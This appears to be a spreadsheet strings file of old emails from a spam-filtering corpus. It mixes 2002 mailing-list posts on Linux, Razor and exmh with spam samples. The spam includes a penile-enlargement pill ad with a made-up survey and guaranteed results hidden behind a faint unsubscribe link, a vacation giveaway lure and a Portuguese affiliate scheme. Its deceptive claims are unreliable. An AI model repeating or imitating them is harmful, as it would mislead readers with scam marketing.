    required for the spammer to get their way.
 Dan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</si>
  <si>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67% of Women Say They are Unhappy              CPBXQ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;b&gt;&lt;FONT SIZE=3D4&gt;In a recent survey conducted by =
 &lt;FONT COLOR=3D#0033FF&gt;&lt;B&gt;Durex&lt;/B&gt;
 &lt;/FONT&gt;condoms, &lt;FONT COLOR=3D#FF0033&gt;6=
 7%
 &lt;/FONT&gt;of women said that&lt;br&gt;they are unhappy with the size of their lo=
 vers. Proof that &lt;FONT COLOR=3D#FF0033&gt;size does&lt;br&gt;matter&lt;/FONT&gt;! A large=
  member has much more surface area and is capable of&lt;br&gt;stimulating more n=
 erve endings, providing more pleasure for you and your&lt;br&gt;partner. Our rev=
 olutionary pill developed by world famous pharmacist is&lt;br&gt;guaranteed to i=
 ncrease your size by 1-3".&lt;BR&gt;&lt;A HREF=3D"http://www.mailcomesandgoes.com/v=
 irility/affiliate/affiliatewiz.asp?BannerID=3D1&amp;AffiliateID=3D4&amp;Task=3DCli=
 ck"&gt;Enter here for details&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;b&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3D1 COLOR=3D#FFFF=
 CC&gt;To come off just &lt;A "http://www.mailcomesandgoes.com/virility/affiliate=
 /affiliatewiz.asp?BannerID=3D1&amp;AffiliateID=3D4&amp;Task=3DClick"&gt;Open here&lt;/A&gt;=
 &lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hello hmlflk ! It's Time
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Giveaway Destinations!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;table width="700" border="0" cellpadding="1" bgcolor="#000000" align="center"&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table width="100%" border="0" cellpadding="1" bgcolor="#FFFFFF"&gt;
         &lt;tr&gt; 
           &lt;td colspan="2"&gt;&lt;font size="7" face="Georgia, Times New Roman, Times, serif" color="#0000CC"&gt;VACATION&lt;/font&gt;&lt;font size="7" face="Georgia, Times New Roman, Times, serif" color="#FF0000"&gt; 
             &lt;font size="4"&gt; &lt;b&gt;&lt;font size="3"&gt;Register For One Of Our Giveaway 
             Destinations&lt;/font&gt;&lt;/b&gt;&lt;/font&gt; &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td width="35%" rowspan="5" align="center" valign="middle"&gt;
             &lt;table width="50%" border="0" cellpadding="1"&gt;
               &lt;tr&gt; 
                 &lt;td align="center"&gt;&lt;font size="7" color="#FF0000"&gt; F &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td align="center"&gt;&lt;font size="7" color="#FF0000"&gt;R&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td align="center"&gt;&lt;font size="7" color="#FF0000"&gt;E&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td align="center"&gt;&lt;font size="7" color="#FF0000"&gt;E&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td width="65%"&gt; 
             &lt;div align="center"&gt;&lt;font size="4"&gt;Over 30 Destinations To Choose 
               From!&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td width="65%" align="center"&gt;&lt;font size="4"&gt;&lt;b&gt;&lt;a href="http://www143.wiildaccess.com/form.htm"&gt;Click 
             Here To Register&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td width="65%" align="center"&gt; 
             &lt;table width="50%" border="0" cellpadding="1"&gt;
               &lt;tr&gt; 
                 &lt;td&gt; 
                   &lt;ul&gt;
                     &lt;li&gt;Florida&lt;/li&gt;
                     &lt;li&gt;Eastern United States&lt;/li&gt;
                     &lt;li&gt;Western United States&lt;/li&gt;
                     &lt;li&gt;Caribbean&lt;/li&gt;
                     &lt;li&gt;Mexico&lt;/li&gt;
                     &lt;li&gt;Hawaii&lt;/li&gt;
                   &lt;/ul&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td width="65%" align="center"&gt;&lt;font size="4"&gt;&lt;b&gt;&lt;a href="http://www143.wiildaccess.com/form.htm"&gt;Click 
             Here To Register&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td width="65%"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align="center"&gt; 
           &lt;td colspan="2"&gt;This Is a Free Notification Service. &lt;br&gt;
             If You Do Not Wish To Be Informed About Our &amp;quot;No Obligation&amp;quot; 
             Services&lt;br&gt;
             And Products Or If You Received This In Error Please &lt;a href="http://www143.wiildaccess.com/remove.htm"&gt;Click 
             Here&lt;/a&gt; To Be Removed.. 
             &lt;p&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;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</si>
  <si>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Webmaster ganhe dinheiro !!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Webmaster  !!!
 Cadastre-se agora mesmo, divulgue seu site e ganhe dinheiro $$$.
 Faa parte da grande exploso de vendas de produtos  incrveis e ganhe muito dinheiro! 
 SO 11 SITES COM PRODUTOS E SERVIOS DIFERENCIADOS , PARA EFETUAR O CADASTRO , VOCE DEVE ACESSAR CADA BANNER E
 FAZER SUA INCRIO.
 ACESSE e cadastre-se AGORA  MESMO !!!
 http://www.diitroya.com.br/shopping/pesquisa-acao.asp?codcategoria=8
 PARQUIEJO DII TROYA
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-24 at 14:45, Jim Whitehead wrote:
 &gt; &gt; "Around the world, there is a growing sense that democracy has not
 &gt; &gt; delivered development" Sakiko Fukuda-Parr UN report author
 &gt; 
 &gt; As opposed to some other form of government which has?
 The report, apparently, makes that point as well. Tom seems to have
 taken things a slight bit out of context. :)
 Luis (busily planning his trip to #172)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Parallels
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/24.html#parallels
 Date: 2002-09-24T20:38:57-05:00
 _Jeffrey Zeldman_: OS X Blues update[1]. 
     A couple of intellectuals have pointed out parallels between the rigidity 
     of OS X, which derives its power from Unix and XML, and the rules of 
     standards-based web development, which also compels you to do things the 
     right way instead of using five different non-standard hacks. The parallel 
     is not without merit. Building web pages the right way is hard at first, 
     but once you get it, you never want to go back. Regardless, we miss OS 9's 
     flexibility and ease of use, and a metric ton of logic doesn't offset that 
     feeling of loss. 
 [1] http://www.zeldman.com/daily/0902a.html#osxbluesupdate
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RIP, Robert L Forward
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85482211
 Date: Not supplied
 Robert L Forward, a giant of hard science fiction, has died at 70 of brain 
 cancer. Link[1] Discuss[2] (_Thanks, Michael[3]!_)
 [1] http://www.plokta.com/pnn/stories.php?story=02/09/23/1517277
 [2] http://www.quicktopic.com/boing/H/UcZdn6NE74aGQ
 [3] http://www.michaelbernstein.com/weblog/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Apt-get question
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Stephen wrote :
 &gt; # apt-get install 
 &gt; /mnt/cdrom/Linux/CDBurner/cdrtools-cdrecord-1.11a23-1.i386.rpm
 This is not how apt is meant to be used, see Gordon's answer to your post
 on the Valhalla list for details.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</si>
  <si>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[Razor-users] Fun Uses of Razored Mail
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm taking all my razored mail today and calling any 1-800 numbers I can
 find.  I say "Hi, I'm calling everyone that spammed me today to raise their
 cost of doing business.  You have a great day!"  I'm told I should do it
 from a pay phone, so it costs them 50 cents per call.  If more people did
 this, we could tie up their phone lines and cost them so much money they
 could never make spam work.
 Also fun is the simple "Die Spammer Die!"
 Fox
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Penguin Shell]  Recursive Metaphor
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/20020709.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/20020709.html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&lt;/style&gt;&lt;title&gt;20020709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07.09.2002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I don't usually spend much time explaining metaphors. They are, after all, 
 metaphorical. They can be filled with whatever symbolism you choose. Written 
 well, we all come to some similar understanding of their meaning. But, I'll 
 depart today, contrary to my normal practice, to take a few minutes explaining a 
 recent metaphor.&lt;p&gt;
 I'm a Linux guy through and through. As a user, I see myself as right about at 
 the average on the curve. For love of the language and open source attitude, 
 though, you'd be hard-pressed to find anyone with quite the same level of 
 enthusiasm. Put simply, there's very little about the Linux and broader open 
 source worlds that I don't like or believe in.&lt;p&gt;
 Take, for example, the practice of recursive acronyms. GNU ("Gnu's Not Unix"), 
 HURD ("Herd of Unix-Replacing Daemons"), WINE ("Wine Is Not an Emulator"), even 
 PHP ("PHP Hypertext Processor") - all carry on the tradition of recursion in the 
 Unix/Linux world. Goofy as it sounds, I love this stuff.&lt;p&gt;
 So it is that I set out to create a recursive metaphor last week. It could only 
 have happened on or about the 4th of July. In fact, it happened in the edition 
 of the 3rd. I wrote a piece about how we Americans spend more time over the 
 course of a year talking about what's &lt;i&gt;wrong&lt;/i&gt; with our system than what's 
 right. I wrote it knowing full well that many of the responses I'd get would be 
 a) from readers outside the US and b) in sharp disagreement to my comments or 
 those of citizens of other countries. You're following me, right? People would 
 disagree with an article that said we spend much time disagreeing. This, of 
 course, would prove my point in a somewhat metaphorical way - the perfect 
 recursive metaphor. The point was to be made yet more perfectly by the eventual 
 inclusion in Penguin Shell of the comments of someone from &lt;i&gt;outside&lt;/i&gt; the US 
 disagreeing with my take our argumentativeness as Americans. Ideally, they would 
 be comments that disagreed with our collective American perception of being 
 disagreeable. They would, of course, point out things about which citizens of 
 other countries can disagree with Americans on. By exercising the right to 
 disagree, we'd subtly agree that we have that right. Yet another level of 
 recursion and a final layer of metaphor.&lt;p&gt;
 The response to both my own and Johan Sauviller's comments was overwhelming. In 
 the main, I believe both were appreciated. Many commented on the balance of the 
 two pieces. Some readers were surprised, I think, to see a dissenting opinion 
 published so quickly, if at all. Overall, the ability to express honestly held 
 opinions, to agree and to disagree on a global level closed the circle on the 
 metaphor in a perfect way.&lt;p&gt;
 Things have, however, gotten a bit more ugly in the past few days. I'm not sure 
 whether some were slow in getting to the July 3rd issue, or whether it's just 
 been stewing since then. Take, for instance, these comments by a reader who will 
 remain mercifully nameless:
 &lt;blockquote&gt;
 We get enough
 America bashing from our left-wing whacko extremist press and schools here
 in the USA that we don't wish to hear some (insert favorite adjective here)
 from Belgium whining too!
 &lt;/blockquote&gt;&lt;p&gt;
 Followed by:
 &lt;blockquote&gt;
 ... please don't let Tony single-handedly tarnish the fine reputation
 of Lockergnome. I'm sure there are other articulate Linux experts out there who 
 would be able to replace him.
 &lt;/blockquote&gt;&lt;p&gt;
 ... and, in a later note on the topic ...
 &lt;blockquote&gt;
 Censorship is to be encouraged in a
 free-market society whenever and wherever it doesn't come from the
 government.
 &lt;/blockquote&gt;&lt;p&gt;
 Clearly, the metaphor just whizzed right over the heads of some.&lt;p&gt;
 &lt;a href="http://www.lockergnome.com/issues/daily.html" target="_blank"&gt;Chris&lt;/a&gt; 
 has been great about allowing all his authors plenty of room in the editorial 
 piece at the beginning of each newsletter. This particular piece is no 
 exception. He's shown a quiet confidence in the face of some very shrill 
 comments. While we all generally stay focused on technical issues, Chris has 
 shown unwavering support for the notion that we geeks are, in the end, humans 
 with opinions and thoughts to share. I think it's one of the things that makes 
 the Lockergnome newsletters stand out from the pack - the personal touch.&lt;p&gt;
 So, despite the irrationality of some of this week's comments, I'll continue to 
 occasionally throw in a personal aside with the technical stuff.&lt;p&gt;
 Just watch out. Recursive metaphors are only funny until someone puts an eye 
 out.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Win Apps in Linux?&lt;/b&gt;&lt;p&gt;
 Yesterday, I mentioned an interesting review of two products for Linux by &lt;a 
 href="http://www.codeweavers.com/" target="_blank"&gt;CodeWeavers&lt;/a&gt; - CrossOver 
 Office and CrossOver Plugin. You've probably heard of both by now, as they've 
 garnered quite a bit of publicity both in and out of the Linux world. You'll 
 recall that I promised to try to secure copies for review this week. With the 
 help of a friendly sales rep at CodeWeavers, I was able to accomplish that task 
 this morning. True to the second half of the promise, we'll spend the next few 
 days looking at these two products and how they might impact your Linux use. 
 Let's take them in chronological order, starting today with CrossOver Plugin.&lt;p&gt;
 A bit of background is in order. CodeWeavers is, in their own words, " ... the 
 leading corporate backer of the &lt;a href="http://wine.codeweavers.com/" 
 target="_blank"&gt;Wine Project&lt;/a&gt;. Wine has been, for the past several years, an 
 ongoing project to port Windows applications to Linux. It's a tough goal, but 
 it's also one that's been undertaken by &lt;a href="http://www.lindows.com/" 
 target="_blank"&gt;others&lt;/a&gt; in the past year or so. Though the progress has been 
 slow, the Wine project has managed to stay at the front of this development 
 realm.&lt;p&gt;
 &lt;a href="http://codeweavers.com/products/crossover/" target="_blank"&gt;CrossOver 
 Plugin&lt;/a&gt; marks a change in the philosophy of the Wine Project. Prior to its 
 release, Wine had taken a "full system" approach. Running Windows applications 
 in Wine required the installation of a sizeable daemon and no small amount of 
 configuration work. CrossOver Plugin has moved Wine away from the system-wide 
 approach to one that's much more modular. Rather than executing at system 
 startup, Wine is called as-needed, with the virtual Windows path to the called 
 program. When the program is closed, so is Wine. CrossOver Plugin has focused on 
 creating Linux functionality with &lt;i&gt;one&lt;/i&gt; related set of Windows 
 applications: browser plugins.&lt;p&gt;
 The results stand as a clear indication that the change in philosophy is a 
 success. Off the top, CrossOver Plugin bundles QuickTime 5, Windows Media Player 
 6.2, Shockwave 8.5, Flash 6, and RealPlayer 8 into a Linux-accesible browser 
 plugin package. Throw in more esoteric apps like IPix, Trillian, Authorware Web 
 Player 6 and eFax Messenger 2, and you've got virtually every need plugin need 
 covered.&lt;p&gt;
 But this package doesn't stop there. Included in the CrossOver Plugin package 
 are viewers for Word, Excel and Powerpoint, as well as several 
 Microsoft-oriented fonts. Honestly, I was stunned at the range of applications 
 offered by the CodeWeavers developers.&lt;p&gt;
 Having had some experience with Wine, I was a bit leery about the install 
 process and about the ability to get all these great applications to work with 
 my RedHat setup. I've never been completely successful with Wine, but I hoped 
 for the best when I started the CrossOver Plugin installation. I really did want 
 these apps to work.&lt;p&gt;
 The installation was quite easy. By running the install-crossover.sh script from 
 the command line, I was able to install the installers for both CrossOver Plugin 
 and CrossOver Office, which we'll talk about tomorrow. I started the plugin 
 installs with QuickTime, a tool I've admittedly missed in Linux. In the 
 background, CrossOver Plugin had already created a virtual C:\ drive on my 
 machine. I clicked on the QuickTime install and immediately saw a familiar sight 
 - the Vise installer in its Windows format. CrossOver Plugin first checked for 
 feedback from the Windows binary, opened a virtual Windows window, then stepped 
 out while the Vise installer took care of the rest. Though the install failed 
 four times, it appeared to be a server failure rather than a failure of the 
 CrossOver program. I kept "retry"ing and, with some persistence, managed to get 
 a full QuickTime 5 install downloaded from the Apple servers. Quite literally, 
 the install looked and performed exactly as I've seem many times in Windows. 
 When the install was completed, CrossOver again checked for the Windows binary, 
 located the appropriate .dll files in the virtual C:\ drive and dropped the 
 plugins into the /home/tony/.netscape/plugins and /home/tony/.mozilla/plugins 
 directories.&lt;p&gt;
 The process was so smooth that I had to check the plugin listings in these 
 browsers - "Help", "About Plugins." Sure enough, the CrossOver QuickTime plugin 
 was listed. Quickly, I ran out to the Apple site and opened the "Men In Black 
 II" movie trailer. QuickTime performed flawlessly.&lt;p&gt;
 I followed with the Windows Media Player, Shockwave, Flash, IPix, and eFax 
 Messenger installs. Of those, the only ones that weren't self-contained in the 
 CrossOver install were IPix and eFax. Even at that, the installer pointed me to 
 the Windows download then found the .exe file when the download was done. Within 
 a half-hour, I had all installed and tested.&lt;p&gt;
 Then, just for grins, I installed RealPlayer 8 via CrossOver. This was despite 
 the recommendation in the installer screen to use the Linux version. It went as 
 smoothly as the others with one caveat - the player played media files at a much 
 faster speed than that in Windows. Fast enough to make me laugh, in fact, 
 reminded of Dave and Alvin the Chipmunk. Ah well, six out of seven is pretty 
 strong given my previous troubles with Wine.&lt;p&gt;
 I also installed a few fonts - Arial, Times New Roman, Trebuchet, and Veranda. 
 In every case, the install was quick and absolutely painless.&lt;p&gt;
 Wine has always held great promise. At times, it's been painful to watch the 
 tedious pace of development, only because that promise was so alluring. With the 
 backing of CodeWeavers and a fundamental change in the approach to development, 
 Wine has finally realized the goal of integrating Windows applications 
 seamlessly into the stable Linux environment. The results are so strong that, if 
 I didn't know better, I'd swear that a few of these plugins actually run better 
 in Linux than in their native Windows. Honestly, I didn't realize how much I 
 missed them until I started using them in Linux today.&lt;p&gt;
 Tomorrow holds a few surpirses, with a look at CodeWeavers' CrossOver Office 
 package.&lt;p&gt;&lt;p&gt;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IX&lt;/b&gt;&lt;p&gt;
 We're nine parts into the kernel configuration series, with quite a bit yet to 
 go. If you haven't been following along, we're breaking out the configuration 
 screens one at a time in an attempt to shed some light on the purpose and 
 function of each. With that knowledge, you should be able to make a clear 
 decision as to how to configure each section.&lt;p&gt;
 Today, it's the Parallel Port support section. This is pretty simple. If you 
 need parallel port support - such as for a printer - select this option either 
 as a driver built into the kernel or as a loadable module.&lt;p&gt;
 Most will use the PC-style hardware option in conjuction with a Windows printer. 
 But that's not all the parallel port can be used for. As an example, the builds 
 I did with the telescope company required parallel port support, as the 
 telescope cameras were attached to this port.&lt;p&gt;
 Be aware - this kernel configuration option only makes a driver available for 
 the parallel port. The computer's BIOS sets the mode for the port - ECP, EPP, or 
 Auto. On the majority of modern computers, the Auto mode is the default and will 
 work just fine. However, if you have problems communicating with your printer 
 following a kernel recompile, try changing the mode of your printer in the 
 BIOS.&lt;p&gt;
 Tomorrow, it's Plug and Play configuration.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Netics 2.0&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" 
 href="http://www.citi.umich.edu/u/marius/netics/"&gt;http://www.citi.umich.edu/u/marius/netics/&lt;/a&gt;&lt;p&gt;
 "Netics is an extensible network statistics collector. It puts the network 
 interface in promiscuous mode and reads the data stream (after it strips off the 
 appropriate protocol headers), then displays the results at specified intervals, 
 either in a "progress bar" mode or as raw statistics. Currently, it supports 2 
 statistics, both involving entropy: LZW compressability and Ueli Maurer's 
 universal statistical test. Maurer's test is a very good and comprehensive 
 measure of entropy, but requires a large amount of data. The LZW statistic 
 requires much less data."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Helping Hand&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Karl Steenblik&lt;/span&gt;&lt;p&gt;
 "Dear Linux community at Lockergnome.&lt;p&gt;
 "I am the web master for largest health care camp in the State of Utah. 
 No not Cancer camp it is the Diabetic camp.&lt;p&gt;
 "The Foundation for Children and Youth with Diabetes serves about 900
 diabetic children a year and their families.  We have education, family
 support, diet planning and most important is camp.  The place where kids
 can learn about how to better manage their disease.&lt;p&gt;
 "We are a totally non profit camp that puts all money from fees into our
 camp.  We pay no salaries to Physicians, Dietitians, Social Workers,
 Nurses and educators that make our camp possible.  Yes even me the lowly
 web master donates his time and web space at ATT to the cause.&lt;p&gt;
 "ATT recently decided to pull access to our photo page due to a password
 protection.  We give out a password to all parents so that they can see
 photos of camp while the sessions are happening.  We do not however what
 the creeps of the web to have access to photos of our kids.&lt;p&gt;
 "We are looking for someone in the state to help our camp by donating web
 space.  Now it may not be your organization, but I know Linux people and
 Lockergnome and I think someone there may know someone who would be able
 to help us.&lt;p&gt;
 "You can still have access to the public part of our site that ATT has not
 shut down at www.fcyd-inc.org.&lt;p&gt;
 "Please I have the parents of 120 diabetic kids wanting to see photos of
 their children.  They are all e-mailing me and I have no one to turn to.&lt;p&gt;
 "Hoping to hear from someone soon."&lt;p&gt;
 Karl R Steenblik&lt;br&gt;
 Webmaster FCYD camp&lt;br&gt;
 Salt Lake City.&lt;p&gt;
 &lt;a href="mailto:tony@lockergnome.com?subject=Penguin Shell - Donate Web 
 Space"&gt;Help&lt;/a&gt; Karl.&lt;p&gt;
 &lt;p&gt;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&lt;b&gt;Mobilix.org&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://mobilix.org/"&gt;http://mobilix.org/&lt;/a&gt;&lt;p&gt;
 Mobilix.org is a full site related to using Linux on mobile devices, including 
 PDAs and laptops. It includes information for subsctibing to the linux-laptop 
 mailing list, information on Linux-powered wearable computers, WAP enabled 
 access, and Linux on cell phones. Mobilix looks to be a great resource for all 
 kinds of tips, tricks and useful information for taking your Linux on the 
 road.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/20020709.html"&gt;http://www.lockergnome.com/issues/penguinshell/20020709.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@example.com]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</si>
  <si>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Subject: dumb question: X client behind a firewall?
</t>
  </si>
  <si>
    <t xml:space="preserve">Let's say you're behind a firewall and have a NAT address.
 Is there any way to telnet to a linux box out there in the world
 and set your DISPLAY in some way that you can create
 xterms on your own screen?
 - Joe
 -- 
 That girl became the spring wind
 She flew somewhere, far away
 Undoing her hair, lying down, in her sleep
 She becomes the wind.
</t>
  </si>
  <si>
    <t xml:space="preserve">intersectedness: i'd be surprised if beberg ever had a BLOWjob he liked. i
 mean, it would have involved OTHERS, less EVOLVED others.
 :-)
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 Russell Turpin
 Sent: Saturday, September 07, 2002 3:07 PM
 To: fork@example.com
 Subject: RE: Selling Wedded Bliss (was Re: Ouch...)
 CDale:
 &gt;I guess [Geege] doesn't want everyone to know about all the kinky sex she
 &gt;and I have had.
 Yeah, like I'm going to believe that without
 seeing the photos. Next, you'll be telling me
 that Beberg found a job he likes.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail.
 http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Windows port / bug reports?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 Newbie (to the list) question;  I've been working on porting the code to
 run under Perl on Windows.  The changes are fairly minor and can be made
 to interoperate with the current code.  How would one best go about
 getting those changes merged in (better question, would there be
 interest in such a version and getting those changes merged in)?
 Bill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</si>
  <si>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Nessus?
</t>
  </si>
  <si>
    <t xml:space="preserve">Any plans for rolling Nessus RPMs for RH8?  Miss it already...
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hurricane Lili closes shuttle Mission Control
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8477945,1440/
 Date: Not supplied
 The launch is postponed until at least Monday - the first time bad weather in 
 Houston has delayed a shuttle flight
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reunion
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#reunion
 Date: 2002-10-02T09:43:36-05:00
 _Leslie Harpold_: This Too, Shall Pass[1]. &amp;#8220;There's a rumor that my 
 possessions and I will be reunited in about a week.&amp;#8221;
 [1] http://leslie.harpold.com/presents/000077.html
</t>
  </si>
  <si>
    <t xml:space="preserve">
 As a practical matter, I doubt the value sold in such situations ever
 adds up to the value lost.  And the non-pecuiary since of violation,
 loss, and trouble has to get in there somewhere if we are really picky.
 I don't think considering marginal utility of dollars has value in this
 situation.  We aren't debating whether the thief is better off -- he is.
 I'm not a lawyer either.  I played one on TV once but I didn't play a
 very good one and they canceled it after the first episode ...
 The situtation I described came from my recollection of Epstein's
 'Takings'.  He was specifically rejecting the idea of absolute property
 right found in Liberation theology and was using the idea -- that in an
 emergency where my life depends upon it I'm entitled to violate your
 property rights and (more) you are forbidden from using unreasonable
 force to defend them (particularly if you aren't around).
 Maybe I did get it all wrong, but that particular recollection is
 relatively strong precisely because it gave a good reason why my
 libertarian theology needed to be modified.
 He was also analyzing what the common law had come up with, which might
 not be the statuatory law in a particular jurisdiction.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; Russell Turpin
 &gt; Sent: Monday, August 12, 2002 2:15 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: RE: David Friedman: Mail Me the Money!
 &gt; 
 &gt; John Hall:
 &gt; &gt;The case against theft also acknowledges that the value to the thief
 is
 &gt; &gt;often far less than the value to the victim.  Stealing my $1,000
 stereo
 &gt; and
 &gt; &gt;then fencing it for $50 does not result in 'no loss' to the economy
 &gt; &gt;overall. ..
 &gt; 
 &gt; That depends on the value placed on it by the fellow
 &gt; who buys it from the pawn shop. And if you take
 &gt; into account the marginal utility of dollars, the
 &gt; thief may value his lucre more than his victim.
 &gt; 
 &gt; &gt;On the flip side of this, common law allows a breach of property law
 in
 &gt; &gt;precisely the type of scenarios where a net social gain is recorded
 but
 &gt; &gt;the owner's availability to make a contract was problematic. Breaking
 &gt; into
 &gt; &gt;your isolated cabin because I'm starving, for example, is permissible
 if
 &gt; I
 &gt; &gt;later offer restitution for the damage I caused and the food I ate.
 &gt; 
 &gt; I am not a lawyer, but I think this is an incorrect
 &gt; analysis of what the law allows in emergencies. I
 &gt; can break into your cabin, take your rifle, grab a
 &gt; box of your ammo, and shoot the bear that is mauling
 &gt; a poor hiker, without having committed the crimes of
 &gt; breaking and entering, theft, hunting out of season,
 &gt; and killing an endangered species, whether or not I
 &gt; later offer to pay for your window and ammunition.
 &gt; The law simply puts a higher priority on saving
 &gt; human life in emergency than on these other things.
 &gt; 
 &gt; Now yes, you can turn around and sue me for
 &gt; recompense. But that is a civil issue, not a
 &gt; criminal one. Crime requires mens rea. And when I
 &gt; shot the bear, I wasn't thinking about who owned
 &gt; the bullet.
 &gt; 
 &gt; 
 &gt; 
 &gt; _________________________________________________________________
 &gt; MSN Photos is the easiest way to share and print your photos:
 &gt; http://photos.msn.com/support/worldwide.aspx
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_1089505257P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Brent Welch &lt;welch@panasas.com&gt;
 &gt; Date:  Wed, 28 Aug 2002 10:32:42 -0700
 &gt;
 &gt; 
 &gt; &gt;&gt;&gt;Robert Elz said:
 &gt;  &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the
 &gt;  &gt; context file) but I'm not sure how frequently that one is called.
 &gt; 
 &gt; In some places I maintain caches of files by checking their modify time,
 &gt; but the sequence files are soo small that by the time you stat them to
 &gt; check their date stamp, you could just read them again.
 Do you really think this is true?  I added a modify time check thinking that 
 it would make an improvement since we were reading it a *lot* more times in 
 the new code because we're trying to use the sequences.
 On the other hand, the sequences files are probably being read out of cache 
 when that happens anyway.
 Even with a small file, I'd think that the time taken to do a 
 [file mtime $filename] would be worth it.  My code is in proc MhReadSeqs.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1089505257P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9bSO7K9b4h5R0IUIRArNLAKCEDkKX52y2P9sdtrcPsgTEmGZhBgCfe2QY
 VNJN/s+r1/dmpUA2v+Gihc4=
 =wxvL
 -----END PGP SIGNATURE-----
 --==_Exmh_1089505257P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
